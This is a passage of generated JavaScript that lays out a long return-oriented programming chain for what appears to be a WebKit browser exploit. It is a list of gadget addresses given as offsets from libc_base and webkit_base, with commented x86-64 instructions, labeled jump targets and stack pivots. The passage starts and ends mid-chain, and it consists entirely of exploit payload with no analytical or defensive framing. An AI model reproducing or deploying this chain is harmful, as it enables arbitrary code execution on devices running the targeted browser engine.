ropchain+387968, //L8072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8072:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+388104, //L8076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+388088, //L8075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8074:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8075:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8076:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+388168, //L8077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8077:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8079:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L8081:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+388328, //L8084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+388312, //L8082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8082:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8084:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+388472, //L8087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+388440, //L8085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+388456, //L8086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8085:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8086:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8087:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+388560, //L8089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L8088:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L8089:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+388616, //L8090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8090:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8092:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+388696, //L8094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8094:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+393104, //L7904
//L7738:
libc_base+764760, //pop rsi
ropchain+388792, //L8095
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8095:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8097:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+388912, //L8100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+388896, //L8098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8098:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8100:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+389088, //L8103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+389104, //L8104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+389056, //L8101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+389072, //L8102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8101:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8102:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8103:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8104:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+389200, //L8106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+389184, //L8105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8105:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8106:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8107:
db([8, 0]); // 0x8
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8108:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L8109:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+389480, //L8111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+389496, //L8112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+389464, //L8110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8110:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8111:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8112:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+389608, //L8114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+389656, //L8117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+389624, //L8115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8114:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8115:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8116:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8117:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+389768, //L8118+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+389760, //L8118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8118:
db([0, 0]); // 0x0
set_gadgets([
ropchain+389784, //L8118+24
ropchain+389920, //L8113
libc_base+759608 //pop rax
]);
//L8119:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8120:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L8121:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+782311, //pop rsp
ropchain+390040, //L8122
//L8113:
libc_base+759608 //pop rax
]);
//L8123:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8124:
db([9, 0]); // 0x9
set_gadget(libc_base+763368,); //pop rcx
//L8125:
db([9, 0]); // 0x9
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
//L8122:
libc_base+764760, //pop rsi
ropchain+390080, //L8127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8127:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+390136, //L8128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8128:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+390272, //L8132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+390256, //L8131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8130:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8131:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8132:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+390336, //L8133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8133:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8135:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L8137:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+390496, //L8140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+390480, //L8138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8138:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8140:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+390640, //L8143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+390608, //L8141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+390624, //L8142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8141:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8142:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8143:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+390728, //L8145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L8144:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L8145:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+390784, //L8146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8146:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8148:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+390864, //L8150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+393104, //L7904
//L7768:
libc_base+764760, //pop rsi
ropchain+390960, //L8151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8151:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8153:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+391080, //L8156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+391064, //L8154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8154:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8156:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+391256, //L8159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+391272, //L8160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+391224, //L8157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+391240, //L8158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8157:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8158:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8159:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8160:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+391368, //L8162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+391352, //L8161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8161:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8162:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8163:
db([8, 0]); // 0x8
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8164:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L8165:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+391648, //L8167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+391664, //L8168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+391632, //L8166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8166:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8167:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8168:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+391776, //L8170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+391824, //L8173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+391792, //L8171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8170:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8171:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8172:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8173:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+391936, //L8174+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+391928, //L8174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8174:
db([0, 0]); // 0x0
set_gadgets([
ropchain+391952, //L8174+24
ropchain+392088, //L8169
libc_base+759608 //pop rax
]);
//L8175:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8176:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L8177:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+782311, //pop rsp
ropchain+392208, //L8178
//L8169:
libc_base+759608 //pop rax
]);
//L8179:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8180:
db([9, 0]); // 0x9
set_gadget(libc_base+763368,); //pop rcx
//L8181:
db([9, 0]); // 0x9
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
//L8178:
libc_base+764760, //pop rsi
ropchain+392248, //L8183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8183:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+392304, //L8184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8184:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+392440, //L8188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+392424, //L8187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8186:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8187:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8188:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+392504, //L8189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8189:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8191:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L8193:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+392664, //L8196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+392648, //L8194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8194:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+392808, //L8199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+392776, //L8197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+392792, //L8198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8197:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8198:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8199:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+392896, //L8201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L8200:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L8201:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+392952, //L8202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8202:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8204:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+393032, //L8206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8206:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+393104, //L7904
//L7769:
libc_base+782311, //pop rsp
ropchain+393104, //L7904
//L7904:
libc_base+764760, //pop rsi
ropchain+393144, //L8207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8207:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8209:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+393264, //L8212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+393248, //L8210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8210:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8212:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+393344, //L8213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+393360, //L8214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8213:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8214:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+393520, //L8218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+393488, //L8216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+393504, //L8217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8215:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8216:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8217:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8218:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+393576, //L8220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8220:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+393704, //L8222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+393720, //L8223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+393688, //L8221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8221:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8222:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8223:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+393880, //L8227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+393848, //L8225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+393864, //L8226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8224:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8225:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8226:
db([0, 0]); // 0x0
